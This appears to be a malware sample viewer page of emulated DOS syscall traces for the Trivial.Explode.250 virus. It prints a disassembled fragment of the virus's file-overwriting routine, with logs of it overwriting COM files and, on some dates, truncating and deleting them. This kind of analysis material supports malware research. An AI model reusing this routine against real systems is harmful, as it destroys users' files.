Sample viewer

vx.netlux.org/Virus.DOS.Trivial.Explode.250

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:45:46.182427856Z 42 PC: 12a44 | Get date 0x12a44: cmp dh, 7
0x12a47: je 0x12a7e
0x12a49: cmp dh, 8
0x12a4c: je 0x12a7e
0x12a4e: mov ah, 0x4e
0x12a50: mov cl, 0x20
0x12a52: mov dx, 0x1a7
0x12a55: int 0x21
0x12a57: mov ax, 0x3d01
0x12a5a: mov dx, 0x9e
0x12a5d: int 0x21
0x12a5f: mov bx, ax
0x12a61: mov dx, 0x100
0x12a64: mov cx, 0xfa
0x12a67: mov ah, 0x40
0x12a69: int 0x21
0x12a6b: mov ah, 0x3e
0x12a6d: int 0x21
0x12a6f: mov ah, 0x4f
0x12a71: int 0x21
2018-12-17T22:45:46.185559784Z 78 PC: 12a57 | Find first file
2018-12-17T22:45:46.192079407Z 61 PC: 12a5f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:45:46.199109938Z 64 PC: 12a6b | Write file or device (Write 250 bytes on handle 5)
2018-12-17T22:45:46.207238301Z 62 PC: 12a6f | Close file
2018-12-17T22:45:46.221519965Z 79 PC: 12a73 | Find next file
2018-12-17T22:45:46.224351411Z 61 PC: 12a5f | Open file (Filename = 'PRINT.COM')
2018-12-17T22:45:46.231526742Z 64 PC: 12a6b | Write file or device (Write 250 bytes on handle 5)
2018-12-17T22:45:46.238111741Z 62 PC: 12a6f | Close file
2018-12-17T22:45:46.245926221Z 79 PC: 12a73 | Find next file
2018-12-17T22:45:46.25052682Z 61 PC: 12a5f | Open file (Filename = 'HELLO.COM')
2018-12-17T22:45:46.258788574Z 64 PC: 12a6b | Write file or device (Write 250 bytes on handle 5)
2018-12-17T22:45:46.266078382Z 62 PC: 12a6f | Close file
2018-12-17T22:45:46.274151525Z 79 PC: 12a73 | Find next file
2018-12-17T22:45:46.277651888Z 61 PC: 12a5f | Open file (Filename = 'PHANG.COM')
2018-12-17T22:45:46.284278543Z 64 PC: 12a6b | Write file or device (Write 250 bytes on handle 5)
2018-12-17T22:45:46.290968991Z 62 PC: 12a6f | Close file
2018-12-17T22:45:46.306756679Z 79 PC: 12a73 | Find next file
2018-12-17T22:45:46.30950516Z 61 PC: 12a5f | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:45:46.316409249Z 64 PC: 12a6b | Write file or device (Write 250 bytes on handle 5)
2018-12-17T22:45:46.323936183Z 62 PC: 12a6f | Close file
2018-12-17T22:45:46.331302153Z 79 PC: 12a73 | Find next file
2018-12-17T22:45:46.333776591Z 61 PC: 12a5f | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:45:46.34072636Z 64 PC: 12a6b | Write file or device (Write 250 bytes on handle 5)
2018-12-17T22:45:46.347691783Z 62 PC: 12a6f | Close file
2018-12-17T22:45:46.355125254Z 79 PC: 12a73 | Find next file
2018-12-17T22:45:46.35878893Z 61 PC: 12a5f | Open file (Filename = 'PAH.COM')
2018-12-17T22:45:46.36534965Z 64 PC: 12a6b | Write file or device (Write 250 bytes on handle 5)
2018-12-17T22:45:46.371928582Z 62 PC: 12a6f | Close file
2018-12-17T22:45:46.380340245Z 79 PC: 12a73 | Find next file
2018-12-17T22:45:46.383177417Z 9 PC: 12a7c | Display string (String= 'EXE Error')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8652,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:39.153860433Z 42 PC: 12a44 | Get date 0x12a44: cmp dh, 7
0x12a47: je 0x12a7e
0x12a49: cmp dh, 8
0x12a4c: je 0x12a7e
0x12a4e: mov ah, 0x4e
0x12a50: mov cl, 0x20
0x12a52: mov dx, 0x1a7
0x12a55: int 0x21
0x12a57: mov ax, 0x3d01
0x12a5a: mov dx, 0x9e
0x12a5d: int 0x21
0x12a5f: mov bx, ax
0x12a61: mov dx, 0x100
0x12a64: mov cx, 0xfa
0x12a67: mov ah, 0x40
0x12a69: int 0x21
0x12a6b: mov ah, 0x3e
0x12a6d: int 0x21
0x12a6f: mov ah, 0x4f
0x12a71: int 0x21
2018-12-25T12:21:39.157215838Z 78 PC: 12a57 | Find first file
2018-12-25T12:21:39.164150371Z 61 PC: 12a5f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:21:39.172263173Z 64 PC: 12a6b | Write file or device (Write 250 bytes on handle 5)
2018-12-25T12:21:39.179655844Z 62 PC: 12a6f | Close file
2018-12-25T12:21:39.196883727Z 79 PC: 12a73 | Find next file
2018-12-25T12:21:39.199954801Z 61 PC: 12a5f | Open file (See above)
2018-12-25T12:21:39.207767773Z 64 PC: 12a6b | Write file or device (See above)
2018-12-25T12:21:39.215695211Z 62 PC: 12a6f | Close file (See above)
2018-12-25T12:21:39.22548078Z 79 PC: 12a73 | Find next file (See above)
2018-12-25T12:21:39.228639733Z 61 PC: 12a5f | Open file (See above)
2018-12-25T12:21:39.237131462Z 64 PC: 12a6b | Write file or device (See above)
2018-12-25T12:21:39.244899712Z 62 PC: 12a6f | Close file (See above)
2018-12-25T12:21:39.253390367Z 79 PC: 12a73 | Find next file (See above)
2018-12-25T12:21:39.256962693Z 61 PC: 12a5f | Open file (See above)
2018-12-25T12:21:39.264327876Z 64 PC: 12a6b | Write file or device (See above)
2018-12-25T12:21:39.279077939Z 62 PC: 12a6f | Close file (See above)
2018-12-25T12:21:39.288650019Z 79 PC: 12a73 | Find next file (See above)
2018-12-25T12:21:39.291697497Z 61 PC: 12a5f | Open file (See above)
2018-12-25T12:21:39.299041219Z 64 PC: 12a6b | Write file or device (See above)
2018-12-25T12:21:39.306700979Z 62 PC: 12a6f | Close file (See above)
2018-12-25T12:21:39.315248596Z 79 PC: 12a73 | Find next file (See above)
2018-12-25T12:21:39.317881858Z 61 PC: 12a5f | Open file (See above)
2018-12-25T12:21:39.325005268Z 64 PC: 12a6b | Write file or device (See above)
2018-12-25T12:21:39.332858122Z 62 PC: 12a6f | Close file (See above)
2018-12-25T12:21:39.341371254Z 79 PC: 12a73 | Find next file (See above)
2018-12-25T12:21:39.344085605Z 61 PC: 12a5f | Open file (See above)
2018-12-25T12:21:39.35148116Z 64 PC: 12a6b | Write file or device (See above)
2018-12-25T12:21:39.358846648Z 62 PC: 12a6f | Close file (See above)
2018-12-25T12:21:39.368315443Z 79 PC: 12a73 | Find next file (See above)
2018-12-25T12:21:39.376841265Z 9 PC: 12a7c | Display string (String= 'EXE Error')

{"DateBased":true,"Day":1,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8652,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:39.540056004Z 42 PC: 12a44 | Get date 0x12a44: cmp dh, 7
0x12a47: je 0x12a7e
0x12a49: cmp dh, 8
0x12a4c: je 0x12a7e
0x12a4e: mov ah, 0x4e
0x12a50: mov cl, 0x20
0x12a52: mov dx, 0x1a7
0x12a55: int 0x21
0x12a57: mov ax, 0x3d01
0x12a5a: mov dx, 0x9e
0x12a5d: int 0x21
0x12a5f: mov bx, ax
0x12a61: mov dx, 0x100
0x12a64: mov cx, 0xfa
0x12a67: mov ah, 0x40
0x12a69: int 0x21
0x12a6b: mov ah, 0x3e
0x12a6d: int 0x21
0x12a6f: mov ah, 0x4f
0x12a71: int 0x21
2018-12-25T12:21:39.54262793Z 9 PC: 12a85 | Display string (String= 'Explode 2.00')
2018-12-25T12:21:39.548386876Z 78 PC: 12a8e | Find first file
2018-12-25T12:21:39.555201894Z 67 PC: 12a9a | Get or set file attributes
2018-12-25T12:21:39.572462446Z 60 PC: 12aa0 | Create or truncate file
2018-12-25T12:21:39.58616721Z 62 PC: 12aa4 | Close file
2018-12-25T12:21:39.588154848Z 65 PC: 12aa8 | Delete file (Filename = 'SLEEP.COM')
2018-12-25T12:21:39.59926918Z 79 PC: 12aac | Find next file
2018-12-25T12:21:39.602603117Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.613715148Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.627189238Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.635925582Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.646850435Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.64976255Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.660943656Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.674713461Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.676560104Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.687997632Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.691089063Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.702078747Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.715983526Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.718278738Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.729668694Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.733093146Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.746021996Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.75980153Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.761895176Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.773469902Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.776629349Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.787585799Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.802757455Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.805008364Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.81603267Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.825058835Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.839660377Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.852922654Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.854786888Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.866986856Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:42.086598155Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:21:42.088829481Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:21:42.091816563Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:21:42.094962702Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:21:42.106735018Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:21:42.109202641Z 62 PC: 91fc1 | Close file
2018-12-25T12:21:42.111824747Z 75 PC: 91fe0 | Execute program
2018-12-25T12:21:42.129837276Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:21:42.132300872Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:21:42.136995805Z 48 PC: c609 | Get DOS version
2018-12-25T12:21:42.140696764Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:21:42.145409382Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:21:42.14811042Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:21:42.153345076Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:21:42.158543215Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:21:42.16449538Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:21:42.177053415Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:21:42.179204677Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:21:42.187081118Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:21:42.213909551Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:21:42.220114167Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:21:42.22556357Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:21:42.227121311Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:21:42.228411117Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:21:42.246121474Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:21:42.247671088Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:21:42.256592857Z 62 PC: 8f8eb | Close file
2018-12-25T12:21:42.259529324Z 62 PC: 8f8f2 | Close file
2018-12-25T12:21:42.261558349Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.263119811Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.265252912Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.267212916Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.269221449Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.276261181Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.279394227Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.281549497Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.283804401Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.28668374Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.289588451Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.291629973Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.294711866Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.296470272Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.298165453Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.301063198Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.302845847Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.304885692Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.307659565Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.309761704Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.311702718Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.313842313Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.316476811Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.318209846Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.320381232Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.322956664Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.324880951Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.326800447Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.329534776Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.331468846Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:21:42.337151611Z 62 PC: 8f90e | Close file
2018-12-25T12:21:42.339695424Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:21:42.341643016Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:21:42.343382548Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:21:42.351633668Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:21:42.353201615Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:21:42.358762233Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:21:42.362029147Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:21:42.363850522Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:21:42.366109746Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:21:42.368308153Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:21:42.370357732Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:21:42.373363588Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:21:42.375409075Z 73 PC: 8fa11 | Release memory
2018-12-25T12:21:42.378157329Z 73 PC: 8efea | Release memory
2018-12-25T12:21:42.380008142Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:21:42.382111908Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:21:42.385419453Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:21:42.387583622Z 73 PC: 8f060 | Release memory
2018-12-25T12:21:42.389458116Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:21:42.400212245Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:21:42.406928703Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:21:42.408863148Z 62 PC: 8f0d1 | Close file
2018-12-25T12:21:42.412054393Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:21:42.436234236Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:21:42.437581155Z 48 PC: 12bee | Get DOS version
2018-12-25T12:21:42.441107837Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:21:42.443883837Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:21:42.445583726Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:21:42.448311801Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:21:42.450096705Z 72 PC: 1355d | Allocate memory
2018-12-25T12:21:42.451952199Z 25 PC: 13596 | Get default drive
2018-12-25T12:21:42.45421649Z 71 PC: 135ad | Get current directory
2018-12-25T12:21:42.456964098Z 59 PC: 135ba | Change current directory
2018-12-25T12:21:42.462774703Z 59 PC: 135c8 | Change current directory
2018-12-25T12:21:42.469861176Z 59 PC: 135d3 | Change current directory
2018-12-25T12:21:42.474756697Z 25 PC: 12d13 | Get default drive
2018-12-25T12:21:42.476731339Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:21:42.479837291Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:21:42.481919567Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:21:42.485077332Z 80 PC: 1301d | Set current PSP
2018-12-25T12:21:42.487041191Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:21:42.490104269Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:21:42.492071571Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:21:42.493889019Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:21:42.497821377Z 72 PC: 130ec | Allocate memory
2018-12-25T12:21:42.50025464Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:21:42.50795418Z 62 PC: 131ba | Close file
2018-12-25T12:21:42.511808692Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:21:42.513474556Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:21:42.515445602Z 72 PC: 11991 | Allocate memory
2018-12-25T12:21:42.518743883Z 73 PC: 119b2 | Release memory
2018-12-25T12:21:42.520579328Z 72 PC: 119bd | Allocate memory
2018-12-25T12:21:42.523655788Z 73 PC: 119df | Release memory
2018-12-25T12:21:42.52707659Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:21:42.529418187Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8652,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:39.576373401Z 42 PC: 12a44 | Get date 0x12a44: cmp dh, 7
0x12a47: je 0x12a7e
0x12a49: cmp dh, 8
0x12a4c: je 0x12a7e
0x12a4e: mov ah, 0x4e
0x12a50: mov cl, 0x20
0x12a52: mov dx, 0x1a7
0x12a55: int 0x21
0x12a57: mov ax, 0x3d01
0x12a5a: mov dx, 0x9e
0x12a5d: int 0x21
0x12a5f: mov bx, ax
0x12a61: mov dx, 0x100
0x12a64: mov cx, 0xfa
0x12a67: mov ah, 0x40
0x12a69: int 0x21
0x12a6b: mov ah, 0x3e
0x12a6d: int 0x21
0x12a6f: mov ah, 0x4f
0x12a71: int 0x21
2018-12-25T12:21:39.578984833Z 9 PC: 12a85 | Display string (String= 'Explode 2.00')
2018-12-25T12:21:39.58158111Z 78 PC: 12a8e | Find first file
2018-12-25T12:21:39.588964845Z 67 PC: 12a9a | Get or set file attributes
2018-12-25T12:21:39.61148178Z 60 PC: 12aa0 | Create or truncate file
2018-12-25T12:21:39.625338417Z 62 PC: 12aa4 | Close file
2018-12-25T12:21:39.627293457Z 65 PC: 12aa8 | Delete file (Filename = 'SLEEP.COM')
2018-12-25T12:21:39.639256863Z 79 PC: 12aac | Find next file
2018-12-25T12:21:39.643194619Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.654593489Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.668154771Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.671016985Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.682241079Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.685077097Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.696976451Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.710249556Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.712192148Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.734985938Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.738517006Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.749335077Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.762632186Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.765135159Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.776559411Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.780059313Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.792404014Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.812452707Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.814377176Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.83603114Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.839246515Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.850050617Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.864612494Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.86651998Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.877938899Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:39.881432215Z 67 PC: 12a9a | Get or set file attributes (See above)
2018-12-25T12:21:39.892343742Z 60 PC: 12aa0 | Create or truncate file (See above)
2018-12-25T12:21:39.908049082Z 62 PC: 12aa4 | Close file (See above)
2018-12-25T12:21:39.910829824Z 65 PC: 12aa8 | Delete file (See above)
2018-12-25T12:21:39.919857626Z 79 PC: 12aac | Find next file (See above)
2018-12-25T12:21:42.152581999Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:21:42.154544296Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:21:42.15789481Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:21:42.161392981Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:21:42.173653298Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:21:42.176222099Z 62 PC: 91fc1 | Close file
2018-12-25T12:21:42.178938665Z 75 PC: 91fe0 | Execute program
2018-12-25T12:21:42.19713142Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:21:42.199613638Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:21:42.204630085Z 48 PC: c609 | Get DOS version
2018-12-25T12:21:42.208633295Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:21:42.212309087Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:21:42.215767816Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:21:42.220420384Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:21:42.225574856Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:21:42.230767641Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:21:42.242409416Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:21:42.245209402Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:21:42.248019309Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:21:42.276480663Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:21:42.281062915Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:21:42.283406811Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:21:42.284817185Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:21:42.28604137Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:21:42.288137351Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:21:42.289717839Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:21:42.29850965Z 62 PC: 8f8eb | Close file
2018-12-25T12:21:42.301552228Z 62 PC: 8f8f2 | Close file
2018-12-25T12:21:42.304056855Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.306049306Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.308785631Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.311154598Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.313215565Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.315441932Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.3182987Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.319831717Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.321419615Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.323789622Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.325659341Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.327600051Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.330587259Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.332568066Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.334555888Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.337336549Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.3397274Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.341805717Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.344435518Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.34667971Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.348720261Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.350955409Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.357264367Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.359100709Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.360849531Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.365366095Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.367311605Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.369282837Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.371533682Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:21:42.373231426Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:21:42.378678157Z 62 PC: 8f90e | Close file
2018-12-25T12:21:42.381306013Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:21:42.383164103Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:21:42.384923677Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:21:42.390729443Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:21:42.392399166Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:21:42.397839946Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:21:42.400675468Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:21:42.402544297Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:21:42.404598599Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:21:42.407321486Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:21:42.409292905Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:21:42.411458642Z 72 PC: 8fa06 | Allocate memory
